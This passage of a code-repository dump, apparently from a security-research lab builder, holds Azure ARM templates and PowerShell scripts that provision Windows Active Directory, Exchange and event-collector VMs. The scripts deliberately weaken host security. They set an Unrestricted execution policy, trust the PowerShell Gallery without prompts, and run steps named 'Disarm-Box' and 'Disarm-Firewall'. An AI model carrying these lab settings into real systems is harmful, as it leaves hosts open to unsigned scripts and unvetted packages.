49 | "protectedSettings": {
50 | "configurationArguments": {
51 | "AdminCreds": {
52 | "UserName": "[parameters('adminUsername')]",
53 | "Password": "[parameters('adminPassword')]"
54 | }
55 | }
56 | }
57 | }
58 | }
59 | ]
60 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/prepareADMSExchange.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "prepareADMXScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "domainController": {
15 | "type": "string"
16 | },
17 | "mxsRelease": {
18 | "type": "string"
19 | },
20 | "mxsISODirectory": {
21 | "type": "string"
22 | },
23 | "adminUsername": {
24 | "type": "string"
25 | },
26 | "adminPassword": {
27 | "type": "securestring"
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
39 | "type": "Microsoft.Compute/virtualMachines/extensions",
40 | "apiVersion": "2019-12-01",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "publisher": "Microsoft.Powershell",
44 | "type": "DSC",
45 | "typeHandlerVersion": "2.77",
46 | "autoUpgradeMinorVersion": true,
47 | "settings": {
48 | "wmfVersion": "latest",
49 | "configuration": {
50 | "url": "[parameters('prepareADMXScript')]",
51 | "script": "PrepareAD-MSExchange.ps1",
52 | "function": "PrepareAD-MSExchange"
53 | },
54 | "configurationArguments": {
55 | "DomainFQDN": "[parameters('domainFQDN')]",
56 | "DomainController": "[parameters('domainController')]",
57 | "MXSRelease": "[parameters('mxsRelease')]",
58 | "MXSISODirectory": "[parameters('mxsISODirectory')]"
59 | }
60 | },
61 | "protectedSettings": {
62 | "configurationArguments": {
63 | "AdminCreds": {
64 | "UserName": "[parameters('adminUsername')]",
65 | "Password": "[parameters('adminPassword')]"
66 | }
67 | }
68 | }
69 | }
70 | }
71 | ]
72 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/nestedtemplates/prepareMSExchange.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "prepareMXScript": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('prepareMXScript')]",
33 | "script": "Prepare-MSExchange.ps1",
34 | "function": "Prepare-MSExchange"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {
39 | "configurationArguments": {}
40 | }
41 | }
42 | }
43 | ]
44 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
#Requires -Version 5
# Installs the DSC resource modules used by the Win10-AD-MXS DSC configurations.
# Called by Set-Initial-Settings.ps1 with the VM's role; runs unattended at provisioning time.

[CmdletBinding()]
param (
    # Role of the VM being prepared; only MXS adds role-specific modules (see bottom).
    [Parameter(Mandatory)]
    [ValidateSet("DC","MXS")]
    [string]$SetupType

)
# Unrestricted removes script-signing enforcement (Set-ExecutionPolicy defaults to the
# LocalMachine scope) and nothing below restores it, so the setting outlives this script.
Set-ExecutionPolicy Unrestricted -Force

# The PowerShell Gallery requires TLS 1.2; force it for the downloads below.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
# Trusting PSGallery suppresses the "untrusted repository" confirmation so the
# unattended Install-Module calls below do not block; it also means anything later
# installed from the gallery on this host is accepted without a prompt.
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted

# Modules needed by both roles, pinned to exact versions.
Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0

# Installed on both roles here (unlike the ADFS flavour, which limits them to the DC).
Install-Module -Name xDnsServer -RequiredVersion 2.0.0
# NOTE(review): xSmbShare, MSOnline and AzureAD carry no -RequiredVersion, so the
# version the gallery serves at deploy time is installed; pinning them like the
# other modules keeps builds reproducible and keeps an unreviewed upstream release
# off the lab hosts.
Install-Module -Name xSmbShare -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force

if ($SetupType -eq 'MXS')
{
    Install-Module -Name xExchange -RequiredVersion 1.33.0
    Install-Module -Name StorageDsc -RequiredVersion 5.0.1
}
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-MXS/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Entry point run on each Win10-AD-MXS VM at provisioning time: installs the DSC
# modules, then applies the lab's baseline settings by running the sibling scripts
# in a fixed order.

[CmdletBinding()]
param (
    # Role of the VM; forwarded to Install-DSC-Modules.ps1 and selects the audit profile.
    [Parameter(Mandatory)]
    [ValidateSet("DC","MXS")]
    [string]$SetupType
)

# DSC modules go first; the scripts that follow may rely on them being present.
& .\Install-DSC-Modules.ps1 -SetupType $SetupType

# Role-independent baseline steps, in execution order.
$baselineSteps = @(
    'Prepare-Box'           # Custom settings applied
    'Disarm-Box'            # Additional configs
    'Disarm-Firewall'       # Additional firewall rules
    'Configure-PSRemoting'  # Enable PSRemoting
)
foreach ($step in $baselineSteps)
{
    & ".\$step.ps1"
}

# Windows Security Audit Categories: the DC gets the domain-controller profile.
switch ($SetupType)
{
    'DC'    { & .\Enable-WinAuditCategories.ps1 -SetDC }
    default { & .\Enable-WinAuditCategories.ps1 }
}

# Telemetry and cosmetics, in execution order.
$telemetrySteps = @(
    'Enable-PowerShell-Logging'  # PowerShell logging
    'Set-SACLs'                  # Set SACLs
    'Set-WallPaper'              # Set wallpaper
)
foreach ($step in $telemetrySteps)
{
    & ".\$step.ps1"
}
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 + Windows Server (Domain Controller - Active Directory) + Windows Event Collector (WEC)
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD-WEC%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD-WEC%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/nestedtemplates/createADForest.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "createADForestScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "adminUsername": {
15 | "type": "string"
16 | },
17 | "adminPassword": {
18 | "type": "securestring"
19 | },
20 | "domainUsers": {
21 | "type": "secureObject"
22 | },
23 | "location": {
24 | "type": "string",
25 | "metadata": {
26 | "description": "Location for all resources."
27 | }
28 | }
29 | },
30 | "resources": [
31 | {
32 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
33 | "type": "Microsoft.Compute/virtualMachines/extensions",
34 | "apiVersion": "2019-12-01",
35 | "location": "[parameters('location')]",
36 | "properties": {
37 | "publisher": "Microsoft.Powershell",
38 | "type": "DSC",
39 | "typeHandlerVersion": "2.77",
40 | "autoUpgradeMinorVersion": true,
41 | "settings": {
42 | "wmfVersion": "latest",
43 | "configuration": {
44 | "url": "[parameters('createADForestScript')]",
45 | "script": "Create-AD.ps1",
46 | "function": "Create-AD"
47 | },
48 | "configurationArguments": {
49 | "DomainFQDN": "[parameters('DomainFQDN')]"
50 | }
51 | },
52 | "protectedSettings": {
53 | "configurationArguments": {
54 | "AdminCreds": {
55 | "UserName": "[parameters('adminUsername')]",
56 | "Password": "[parameters('adminPassword')]"
57 | },
58 | "DomainUsers": "[parameters('domainUsers').array]"
59 | }
60 | }
61 | }
62 | }
63 | ]
64 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of the Windows virtual machine"
9 | }
10 | },
11 | "extensionName": {
12 | "type": "string"
13 | },
14 | "fileUris": {
15 | "type": "array"
16 | },
17 | "commandToExecute": {
18 | "type": "string"
19 | },
20 | "location": {
21 | "type": "string",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "resources": [
28 | {
29 | "type": "Microsoft.Compute/virtualMachines/extensions",
30 | "apiVersion": "2021-07-01",
31 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
32 | "location": "[parameters('location')]",
33 | "properties": {
34 | "publisher": "Microsoft.Compute",
35 | "type": "CustomScriptExtension",
36 | "typeHandlerVersion": "1.8",
37 | "autoUpgradeMinorVersion": true,
38 | "settings": {
39 | "fileUris": "[parameters('fileUris')]",
40 | "commandToExecute": "[parameters('commandToExecute')]"
41 | }
42 | }
43 | }
44 | ]
45 | }
46 |
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/nestedtemplates/customScriptExtensionArray.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to join to a domain"
9 | }
10 | },
11 | "fileUris": {
12 | "type": "array"
13 | },
14 | "commandToExecute": {
15 | "type": "string"
16 | },
17 | "location": {
18 | "type": "string",
19 | "metadata": {
20 | "description": "Location for all resources."
21 | }
22 | }
23 | },
24 | "resources": [
25 | {
26 | "type": "Microsoft.Compute/virtualMachines/extensions",
27 | "apiVersion": "2021-07-01",
28 | "name": "[concat(parameters('virtualMachines')[copyIndex('CustomScriptCopy')].vmname, '/', parameters('virtualMachines')[copyIndex('CustomScriptCopy')].extensionName)]",
29 | "location": "[parameters('location')]",
30 | "copy": {
31 | "name": "CustomScriptCopy",
32 | "count": "[length(parameters('virtualMachines'))]"
33 | },
34 | "properties": {
35 | "publisher": "Microsoft.Compute",
36 | "type": "CustomScriptExtension",
37 | "typeHandlerVersion": "1.8",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {
40 | "fileUris": "[parameters('fileUris')]",
41 | "commandToExecute": "[parameters('commandToExecute')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
47 |
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
#Requires -Version 5
# Installs the DSC resource modules used by the Win10-AD-WEC DSC configurations.
# Called by Set-Initial-Settings.ps1; runs unattended at provisioning time.

[CmdletBinding()]
param (
    # Role of the VM being prepared. Optional: when omitted, $SetupType is an empty
    # string, the 'DC' branch below is skipped and only the common modules are installed.
    [Parameter(Mandatory=$false)]
    [ValidateSet("DC","WEC")]
    [string]$SetupType

)
# Unrestricted removes script-signing enforcement (Set-ExecutionPolicy defaults to the
# LocalMachine scope) and nothing below restores it, so the setting outlives this script.
Set-ExecutionPolicy Unrestricted -Force

# The PowerShell Gallery requires TLS 1.2; force it for the downloads below.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
# Trusting PSGallery suppresses the "untrusted repository" confirmation so the
# unattended Install-Module calls below do not block; it also means anything later
# installed from the gallery on this host is accepted without a prompt.
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted

# Modules needed by both roles, pinned to exact versions.
Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0

# DNS server resources are only needed on the domain controller.
if ($SetupType -eq 'DC')
{
    Install-Module -Name xDnsServer -RequiredVersion 2.0.0
}
--------------------------------------------------------------------------------
/templates/azure/Win10-AD-WEC/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
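# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Entry point run on each Win10-AD-WEC VM at provisioning time: installs the DSC
# modules, then applies the lab's baseline settings by running the sibling scripts
# in a fixed order.

[CmdletBinding()]
param (
    # Role of the VM. Optional: when omitted, the generic (non-DC) audit profile is
    # applied and Install-DSC-Modules.ps1 is called without a role.
    [Parameter(Mandatory=$false)]
    [ValidateSet("DC","WEC")]
    [string]$SetupType
)

# Install DSC Modules
# Only forward -SetupType when the caller supplied one. The parameter is optional
# here, but Install-DSC-Modules.ps1 validates it against a set, so forwarding the
# empty string that an omitted parameter leaves behind may be rejected there; the
# callee installs only the common modules in both cases.
$dscModuleArgs = @{}
if ($PSBoundParameters.ContainsKey('SetupType'))
{
    $dscModuleArgs['SetupType'] = $SetupType
}
& .\Install-DSC-Modules.ps1 @dscModuleArgs

# Custom Settings applied
& .\Prepare-Box.ps1

# Additional configs
& .\Disarm-Box.ps1

# Additional Firewall rules
& .\Disarm-Firewall.ps1

# Enable PSRemoting
& .\Configure-PSRemoting.ps1

# Windows Security Audit Categories: the DC gets the domain-controller profile.
if ($SetupType -eq 'DC')
{
    & .\Enable-WinAuditCategories.ps1 -SetDC
}
else
{
    & .\Enable-WinAuditCategories.ps1
}

# PowerShell Logging
& .\Enable-PowerShell-Logging.ps1

# Set SACLs
& .\Set-SACLs.ps1

# Set Wallpaper
& .\Set-WallPaper.ps1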
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 + Windows Server (Domain Controller - Active Directory)
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-AD%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/nestedtemplates/createADForest.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "createADForestScript": {
9 | "type": "string"
10 | },
11 | "domainFQDN": {
12 | "type": "string"
13 | },
14 | "domainNetbiosName": {
15 | "type": "string"
16 | },
17 | "adminUsername": {
18 | "type": "string"
19 | },
20 | "adminPassword": {
21 | "type": "securestring"
22 | },
23 | "domainUsers": {
24 | "type": "secureObject"
25 | },
26 | "location": {
27 | "type": "string",
28 | "metadata": {
29 | "description": "Location for all resources."
30 | }
31 | }
32 | },
33 | "resources": [
34 | {
35 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
36 | "type": "Microsoft.Compute/virtualMachines/extensions",
37 | "apiVersion": "2019-12-01",
38 | "location": "[parameters('location')]",
39 | "properties": {
40 | "publisher": "Microsoft.Powershell",
41 | "type": "DSC",
42 | "typeHandlerVersion": "2.77",
43 | "autoUpgradeMinorVersion": true,
44 | "settings": {
45 | "wmfVersion": "latest",
46 | "configuration": {
47 | "url": "[parameters('createADForestScript')]",
48 | "script": "Create-AD.ps1",
49 | "function": "Create-AD"
50 | },
51 | "configurationArguments": {
52 | "DomainFQDN": "[parameters('DomainFQDN')]",
53 | "DomainNetbiosName": "[parameters('domainNetbiosName')]"
54 | }
55 | },
56 | "protectedSettings": {
57 | "configurationArguments": {
58 | "AdminCreds": {
59 | "UserName": "[parameters('adminUsername')]",
60 | "Password": "[parameters('adminPassword')]"
61 | },
62 | "DomainUsers": "[parameters('domainUsers').array]"
63 | }
64 | }
65 | }
66 | }
67 | ]
68 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/nestedtemplates/enableTLS12.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "enableTLS12Script": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('enableTLS12Script')]",
33 | "script": "Enable-TLS12.ps1",
34 | "function": "Enable-TLS12"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {
39 | "configurationArguments": {}
40 | }
41 | }
42 | }
43 | ]
44 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/nestedtemplates/installAADConnect.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installAADConnectScript": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('installAADConnectScript')]",
33 | "script": "Install-AADConnect.ps1",
34 | "function": "Install-AADConnect"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {
39 | "configurationArguments": {}
40 | }
41 | }
42 | }
43 | ]
44 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/nestedtemplates/vnet-dns-server.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualNetworkName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "The name of the Virtual Network to Create"
9 | }
10 | },
11 | "virtualNetworkAddressRange": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "The address range of the new VNET in CIDR format"
15 | }
16 | },
17 | "subnets": {
18 | "type": "array",
19 | "metadata": {
20 | "description": "All subnets of the virtual network"
21 | }
22 | },
23 | "DNSServerAddress": {
24 | "type": "array",
25 | "metadata": {
26 | "description": "The DNS address(es) of the DNS Server(s) used by the VNET"
27 | }
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "type": "Microsoft.Network/virtualNetworks",
39 | "apiVersion": "2019-02-01",
40 | "name": "[parameters('virtualNetworkName')]",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "addressSpace": {
44 | "addressPrefixes": [
45 | "[parameters('virtualNetworkAddressRange')]"
46 | ]
47 | },
48 | "dhcpOptions": {
49 | "dnsServers": "[parameters('DNSServerAddress')]"
50 | },
51 | "subnets": "[parameters('subnets')]"
52 | }
53 | }
54 | ]
55 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
#Requires -Version 5
# Installs the DSC resource modules used by the Win10-AD DSC configurations.
# Called by Set-Initial-Settings.ps1; takes no parameters, every host gets the same set.

# Unrestricted removes script-signing enforcement (Set-ExecutionPolicy defaults to the
# LocalMachine scope) and nothing below restores it, so the setting outlives this script.
Set-ExecutionPolicy Unrestricted -Force

# The PowerShell Gallery requires TLS 1.2; force it for the downloads below.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
# Trusting PSGallery suppresses the "untrusted repository" confirmation so the
# unattended Install-Module calls below do not block; it also means anything later
# installed from the gallery on this host is accepted without a prompt.
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted

# All modules are pinned to exact versions, so the build is reproducible.
Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0

Install-Module -Name xDnsServer -RequiredVersion 2.0.0
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Entry point run on the Win10-AD domain controller at provisioning time: installs
# the DSC modules, then applies the lab's baseline settings by running the sibling
# scripts in a fixed order. Takes no parameters; this flavour always configures a DC.

# DSC modules go first; the scripts that follow may rely on them being present.
& .\Install-DSC-Modules.ps1

# Baseline steps, in execution order.
$baselineSteps = @(
    'Prepare-Box'           # Custom settings applied
    'Disarm-Box'            # Additional configs
    'Disarm-Firewall'       # Additional firewall rules
    'Configure-PSRemoting'  # Enable PSRemoting
)
foreach ($step in $baselineSteps)
{
    & ".\$step.ps1"
}

# Windows Security Audit Categories, domain-controller profile.
& .\Enable-WinAuditCategories.ps1 -SetDC

# Telemetry and cosmetics, in execution order.
$telemetrySteps = @(
    'Enable-PowerShell-Logging'  # PowerShell logging
    'Set-SACLs'                  # Set SACLs
    'Set-WallPaper'              # Set wallpaper
)
foreach ($step in $telemetrySteps)
{
    & ".\$step.ps1"
}
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 + Palo Alto Networks VM-Series Firewall
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-PAN-FW%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-PAN-FW%2Fazuredeploy.json)
4 |
5 | ## VM-Series Licensing
6 |
7 | For both AWS and Microsoft Azure, the licensing options are bring your own license (BYOL) and pay as you go/consumption-based (PAYG) subscriptions.
8 |
9 | * **BYOL**: Any one of the VM-Series models, along with the associated Subscriptions and Support, are purchased via normal Palo Alto Networks channels and then deployed through your AWS or Azure management console.
10 | * **PAYG (Pay-as-you-go)**: Purchase the VM-Series and select Subscriptions and Premium Support as an hourly subscription bundle from the AWS Marketplace.
11 | * **Bundle 1 contents**: VM-300 firewall license, Threat Prevention Subscription (inclusive of IPS, AV, Malware prevention) and Premium Support.
12 | * **Bundle 2 contents**: VM-300 firewall license, Threat Prevention (inclusive of IPS, AV, Malware prevention), WildFire™ threat intelligence service, URL Filtering, GlobalProtect Subscriptions and Premium Support.
13 |
14 | ## Accept Azure VM Marketplace Terms (MUST DO)
15 |
16 | * The Palo Alto Networks (PAN) VM-Series Firewall is deployed from Azure Marketplace. You need to accept the legal terms to use the VM.
17 | * **Make sure you run the commands below before deploying this template**
18 | * You can do it locally via [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest) or via the [Azure Cloud Shell](https://shell.azure.com/).
19 |
20 | Look for the PAN VM-Series Firewall you are deploying:
21 |
22 | ```
23 | az vm image list --all --publisher paloaltonetworks --offer vmseries1 --sku bundle2 --query '[0].urn'
24 | ```
25 |
26 | Accept terms:
27 |
28 | ```
29 | az vm image terms accept --urn paloaltonetworks:vmseries1:bundle2:7.1.1
30 | ```
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/nestedtemplates/customScript.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of the VM to run scripts on"
9 | }
10 | },
11 | "extensionName": {
12 | "type": "string"
13 | },
14 | "fileUris": {
15 | "type": "array"
16 | },
17 | "commandToExecute": {
18 | "type": "string"
19 | },
20 | "location": {
21 | "type": "string",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "resources": [
28 | {
29 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2019-03-01",
32 | "location": "[parameters('location')]",
33 | "properties": {
34 | "publisher": "Microsoft.Azure.Extensions",
35 | "type": "CustomScript",
36 | "typeHandlerVersion": "2.1",
37 | "autoUpgradeMinorVersion": true,
38 | "settings": {},
39 | "protectedSettings": {
40 | "commandToExecute": "[parameters('commandToExecute')]",
41 | "fileUris": "[parameters('fileUris')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "minLength": 1,
8 | "metadata": {
9 | "description": "Name of the Windows machine to run scripts on"
10 | }
11 | },
12 | "extensionName": {
13 | "type": "string"
14 | },
15 | "fileUris": {
16 | "type": "array"
17 | },
18 | "commandToExecute": {
19 | "type": "string"
20 | },
21 | "location": {
22 | "type": "string",
23 | "metadata": {
24 | "description": "Location for all resources."
25 | }
26 | }
27 | },
28 | "resources": [
29 | {
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2016-08-30",
32 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
33 | "location": "[parameters('location')]",
34 | "properties": {
35 | "publisher": "Microsoft.Compute",
36 | "type": "CustomScriptExtension",
37 | "typeHandlerVersion": "1.8",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {
40 | "fileUris": "[parameters('fileUris')]",
41 | "commandToExecute": "[parameters('commandToExecute')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
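# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Runs the post-deployment configuration steps for this box, in order. Each step is a
# sibling script resolved against $PSScriptRoot (the directory this file lives in), so the
# sequence no longer depends on the caller's working directory. A failing step does not
# abort the sequence; that matches the previous behaviour.

$here = $PSScriptRoot

# Custom Settings applied
& (Join-Path $here 'Prepare-Box.ps1')

# Set Windows Audit Policies
& (Join-Path $here 'Enable-WinAuditCategories.ps1')

# Set Audit Rules from Set-AuditRule project
& (Join-Path $here 'Set-SACLs.ps1')

# Set Wallpaper
& (Join-Path $here 'Set-WallPaper.ps1')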
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/scripts/Set-Up-CEF.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
# Prefixes used when echoing progress/error messages from this script.
INFO_TAG='[INSTALLATION-INFO]'
ERROR_TAG='[INSTALLATION-ERROR]'

# Log destination for the firewall setup (defined here; nothing in this script writes to it).
LOGFILE='/var/log/FW-SETUP.log'
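# Print an error line to stderr. RC/EC are optional colour codes taken from the
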